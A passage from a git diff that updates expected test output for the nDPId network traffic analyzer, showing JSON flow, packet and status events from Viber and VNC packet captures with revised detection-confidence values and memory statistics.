-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","packets-captured":440,"packets-processed":435,"total-skipped-flows":0,"total-l4-payload-len":125733,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":24,"total-detection-updates":17,"total-updates":0,"current-active-flows":1,"total-active-flows":27,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":171,"global_ts_msec":1648954023554} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","packets-captured":440,"packets-processed":435,"total-skipped-flows":0,"total-l4-payload-len":125733,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":24,"total-detection-updates":19,"total-updates":0,"current-active-flows":1,"total-active-flows":27,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":173,"global_ts_msec":1648954023554} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648954023554,"flow_last_seen":1648954023554,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648954023554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1648954023554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648954023554,"pkt":"eJS0JASgYDjgxTWgCABFAAA86GpAAD8GYELAqAJkNAD8AqDgFHo59lPMAAAAAKAC\/\/81EwAAAgQFtAQCCArXUgVsAAAAAAEDAwk="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1648954023662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648954023662,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAOwGm6w0APwCwKgCZBR6oOA1qzY9OfZTzaASaN\/krwAAAgQFrAQCCApiDhmE11IFbAEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1648954023691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648954023691,"pkt":"eJS0JASgYDjgxTWgCABFAAA06GtAAD8GYEnAqAJkNAD8AqDgFHo59lPNNas2PoAQAKx7IAAAAQEICtdSBfViDhmE"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648954023554,"flow_last_seen":1648954023697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1648954023697,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":446,"total-skipped-flows":0,"total-l4-payload-len":126273,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":25,"total-detection-updates":17,"total-updates":0,"current-active-flows":2,"total-active-flows":28,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":177,"global_ts_msec":1648968035683} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648954023554,"flow_last_seen":1648954023697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1648954023697,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":446,"total-skipped-flows":0,"total-l4-payload-len":126273,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":25,"total-detection-updates":19,"total-updates":0,"current-active-flows":2,"total-active-flows":28,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":179,"global_ts_msec":1648968035683} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1648968035683,"pkt":"eJS0JASgYDjgxTWgCABFAACU2kpAAD8GpwLAqAJkLMDKSqeUEJTyP2Q6cEHfOoAYAVdrNwAAAQEICphN6aPkLWTjYAAuDuoU\/P8DgFkAGwAAAAAAAAAuDuoUyCWY+Eiv3vNvHuU8izmtmd1xLKgDGQAAAC4GaTctzm2TgBHTuz9kkBDO3BN0gtQM11m3wPtySAu5MwDtuOA\/BIT7TjIAAaAP"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1648954023554,"flow_last_seen":1648954024107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648952182644,"flow_last_seen":1648952183755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3518,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":447,"total-skipped-flows":0,"total-l4-payload-len":126369,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":26,"total-detection-updates":17,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":184,"global_ts_msec":1648968035683} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1648954023554,"flow_last_seen":1648954024107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648952182644,"flow_last_seen":1648952183755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3518,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":447,"total-skipped-flows":0,"total-l4-payload-len":126369,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":26,"total-detection-updates":19,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":186,"global_ts_msec":1648968035683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 451/447 ~~ skipped flows.............: 0 @@ -190,9 +192,9 @@ ~~ total active/idle flows...: 29/29 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6006697 bytes -~~ total memory freed........: 6006697 bytes -~~ total allocations/frees...: 118722/118722 +~~ total memory allocated....: 6100793 bytes +~~ total memory freed........: 6100793 bytes +~~ total allocations/frees...: 121473/121473 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2407 chars diff --git a/test/results/vnc.pcap.out b/test/results/vnc.pcap.out index 4cd795ebf..747980dc6 100644 --- a/test/results/vnc.pcap.out +++ b/test/results/vnc.pcap.out @@ -4,14 +4,14 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} 